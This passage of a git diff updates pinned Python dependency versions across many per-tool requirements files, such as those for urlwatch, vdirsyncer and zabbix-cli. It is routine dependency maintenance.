a/requirements/terraform-local-requirements.txt b/requirements/terraform-local-requirements.txt index ed5a1006..6d9e8ea8 100644 --- a/requirements/terraform-local-requirements.txt +++ b/requirements/terraform-local-requirements.txt @@ -1,11 +1,11 @@ -boto3==1.35.23 -botocore==1.35.23 +boto3==1.35.39 +botocore==1.35.39 jmespath==1.0.1 lark==1.2.2 -localstack-client==2.6 +localstack-client==2.7 packaging==24.1 python-dateutil==2.9.0.post0 -python-hcl2==4.3.5 -s3transfer==0.10.2 +python-hcl2==5.0.0 +s3transfer==0.10.3 six==1.16.0 urllib3==2.2.3 diff --git a/requirements/tmuxp-requirements.txt b/requirements/tmuxp-requirements.txt index 86875765..9071519d 100644 --- a/requirements/tmuxp-requirements.txt +++ b/requirements/tmuxp-requirements.txt @@ -1,3 +1,3 @@ colorama==0.4.6 libtmux==0.37.0 -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/toot-requirements.txt b/requirements/toot-requirements.txt index 649fbd85..6c3b99fd 100644 --- a/requirements/toot-requirements.txt +++ b/requirements/toot-requirements.txt @@ -1,5 +1,5 @@ beautifulsoup4==4.12.3 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 idna==3.10 requests==2.32.3 diff --git a/requirements/touca-requirements.txt b/requirements/touca-requirements.txt index a717bc4f..c4a5956f 100644 --- a/requirements/touca-requirements.txt +++ b/requirements/touca-requirements.txt @@ -3,4 +3,4 @@ flatbuffers==23.5.26 pygments==2.18.0 rich==12.6.0 touca-fbs==0.0.3 -urllib3==1.26.19 +urllib3==1.26.20 diff --git a/requirements/trafilatura-requirements.txt b/requirements/trafilatura-requirements.txt index 8ecb8492..29a50508 100644 --- a/requirements/trafilatura-requirements.txt +++ b/requirements/trafilatura-requirements.txt @@ -1,15 +1,15 @@ babel==2.16.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 courlan==1.3.1 dateparser==1.2.0 -htmldate==1.9.0 +htmldate==1.9.1 justext==3.0.1 lxml==5.3.0 -lxml-html-clean==0.2.2 +lxml-html-clean==0.3.1 python-dateutil==2.9.0.post0 -pytz==2024.1 -regex==2024.7.24 +pytz==2024.2 +regex==2024.9.11 six==1.16.0 tld==0.13 tzlocal==5.2 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/tvnamer-requirements.txt b/requirements/tvnamer-requirements.txt index cf953e6e..7483f093 100644 --- a/requirements/tvnamer-requirements.txt +++ b/requirements/tvnamer-requirements.txt @@ -1,6 +1,6 @@ -charset-normalizer==3.3.2 -idna==3.7 +charset-normalizer==3.4.0 +idna==3.10 requests==2.32.3 requests-cache==0.5.2 tvdb-api==3.1.0 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/twarc-requirements.txt b/requirements/twarc-requirements.txt index e4f5452c..576d4316 100644 --- a/requirements/twarc-requirements.txt +++ b/requirements/twarc-requirements.txt @@ -1,9 +1,9 @@ -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-config-file==0.6.0 click-plugins==1.1.1 configobj==5.0.9 -humanize==4.10.0 +humanize==4.11.0 idna==3.10 oauthlib==3.2.2 python-dateutil==2.9.0.post0 diff --git a/requirements/uhd-requirements.txt b/requirements/uhd-requirements.txt index a0672e3f..5f289485 100644 --- a/requirements/uhd-requirements.txt +++ b/requirements/uhd-requirements.txt @@ -1,2 +1,2 @@ mako==1.3.5 -markupsafe==2.1.5 +markupsafe==3.0.1 diff --git a/requirements/urlwatch-requirements.txt b/requirements/urlwatch-requirements.txt index 525782c9..2a497280 100644 --- a/requirements/urlwatch-requirements.txt +++ b/requirements/urlwatch-requirements.txt @@ -1,14 +1,14 @@ appdirs==1.4.4 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 cssselect==1.2.0 -idna==3.7 +idna==3.10 jaraco-classes==3.4.0 -jaraco-context==5.3.0 -jaraco-functools==4.0.1 -keyring==25.2.1 -lxml==5.2.2 +jaraco-context==6.0.1 +jaraco-functools==4.1.0 +keyring==25.4.1 +lxml==5.3.0 minidb==2.0.8 -more-itertools==10.3.0 -pyyaml==6.0.1 +more-itertools==10.5.0 +pyyaml==6.0.2 requests==2.32.3 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/vdirsyncer-requirements.txt b/requirements/vdirsyncer-requirements.txt index c33ca3d6..9acab85e 100644 --- a/requirements/vdirsyncer-requirements.txt +++ b/requirements/vdirsyncer-requirements.txt @@ -1,17 +1,18 @@ -aiohappyeyeballs==2.4.0 -aiohttp==3.10.5 +aiohappyeyeballs==2.4.3 +aiohttp==3.10.10 aiohttp-oauthlib==0.1.0 aiosignal==1.3.1 aiostream==0.4.5 atomicwrites==1.4.1 attrs==24.2.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-log==0.4.0 frozenlist==1.4.1 -idna==3.8 +idna==3.10 multidict==6.1.0 oauthlib==3.2.2 +propcache==0.2.0 requests==2.32.3 -urllib3==2.2.2 -yarl==1.11.1 +urllib3==2.2.3 +yarl==1.15.1 diff --git a/requirements/vint-requirements.txt b/requirements/vint-requirements.txt index 2b3e11ba..6bc7ba58 100644 --- a/requirements/vint-requirements.txt +++ b/requirements/vint-requirements.txt @@ -1,3 +1,3 @@ ansicolor==0.3.2 chardet==5.2.0 -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/vit-requirements.txt b/requirements/vit-requirements.txt index 4eaccae0..3c2cee6a 100644 --- a/requirements/vit-requirements.txt +++ b/requirements/vit-requirements.txt @@ -1,2 +1,4 @@ tasklib==2.5.1 -urwid==2.2.2 +typing-extensions==4.12.2 +urwid==2.6.15 +wcwidth==0.2.13 diff --git a/requirements/volk-requirements.txt b/requirements/volk-requirements.txt index 98decb7f..5f289485 100644 --- a/requirements/volk-requirements.txt +++ b/requirements/volk-requirements.txt @@ -1,2 +1,2 @@ -mako==1.3.2 -markupsafe==2.1.5 +mako==1.3.5 +markupsafe==3.0.1 diff --git a/requirements/vunnel-requirements.txt b/requirements/vunnel-requirements.txt index 674a9b37..feb34f9a 100644 --- a/requirements/vunnel-requirements.txt +++ b/requirements/vunnel-requirements.txt @@ -1,4 +1,4 @@ -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-default-group==1.2.4 colorlog==6.8.2 @@ -13,7 +13,7 @@ iniconfig==2.0.0 iso8601==2.1.0 jinja2==3.1.4 lxml==5.3.0 -markupsafe==2.1.5 +markupsafe==3.0.1 mashumaro==3.13.1 mergedeep==1.3.4 orjson==3.10.7 @@ -26,7 +26,7 @@ pyyaml==6.0.2 requests==2.32.3 six==1.16.0 sqlalchemy==1.4.54 -tomli==2.0.1 +tomli==2.0.2 toposort==1.10 typing-extensions==4.12.2 untokenize==0.1.1 diff --git a/requirements/watson-requirements.txt b/requirements/watson-requirements.txt index 123cb6fe..e124fb59 100644 --- a/requirements/watson-requirements.txt +++ b/requirements/watson-requirements.txt @@ -1,10 +1,10 @@ arrow==1.3.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-didyoumean==0.3.1 -idna==3.7 +idna==3.10 python-dateutil==2.9.0.post0 requests==2.32.3 six==1.16.0 -types-python-dateutil==2.9.0.20240316 -urllib3==2.2.2 +types-python-dateutil==2.9.0.20241003 +urllib3==2.2.3 diff --git a/requirements/woob-requirements.txt b/requirements/woob-requirements.txt index d1296a0d..2e2cb0d8 100644 --- a/requirements/woob-requirements.txt +++ b/requirements/woob-requirements.txt @@ -1,17 +1,17 @@ -babel==2.15.0 -charset-normalizer==3.3.2 +babel==2.16.0 +charset-normalizer==3.4.0 html2text==2024.2.26 -idna==3.7 -lxml==5.2.2 +idna==3.10 +lxml==5.3.0 markdown-it-py==3.0.0 mdurl==0.1.2 packaging==23.2 pycountry==24.6.1 pygments==2.18.0 python-dateutil==2.9.0.post0 -pyyaml==6.0.1 +pyyaml==6.0.2 requests==2.32.3 -rich==13.7.1 +rich==13.9.2 six==1.16.0 unidecode==1.3.8 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/zabbix-cli-requirements.txt b/requirements/zabbix-cli-requirements.txt index 15ed489f..9b1e4b1b 100644 --- a/requirements/zabbix-cli-requirements.txt +++ b/requirements/zabbix-cli-requirements.txt @@ -1,9 +1,9 @@ annotated-types==0.7.0 -anyio==4.6.0 +anyio==4.6.1 click==8.1.7 click-repl==0.2.0 h11==0.14.0 -httpcore==1.0.5 +httpcore==1.0.6 httpx==0.27.2 idna==3.10 markdown-it-py==3.0.0 @@ -14,14 +14,14 @@ prompt-toolkit==3.0.48 pydantic==2.9.2 pydantic-core==2.23.4 Pygments==2.18.0 -rich==13.9.0 +rich==13.9.2 shellingham==1.5.4 six==1.16.0 sniffio==1.3.1 socksio==1.0.0 StrEnum==0.4.15 -tomli==2.0.1 -tomli-w==1.0.0 +tomli==2.0.2 +tomli-w==1.1.0 typer==0.12.5 typing-extensions==4.12.2 wcwidth==0.2.13